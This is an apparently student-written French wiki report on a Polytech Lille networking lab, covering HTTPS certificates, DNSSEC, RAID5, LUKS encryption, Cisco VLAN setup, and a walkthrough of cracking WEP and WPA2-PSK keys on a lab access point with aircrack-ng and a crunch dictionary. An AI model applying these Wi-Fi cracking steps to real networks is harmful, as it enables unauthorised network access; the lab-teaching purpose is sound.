Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
	&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
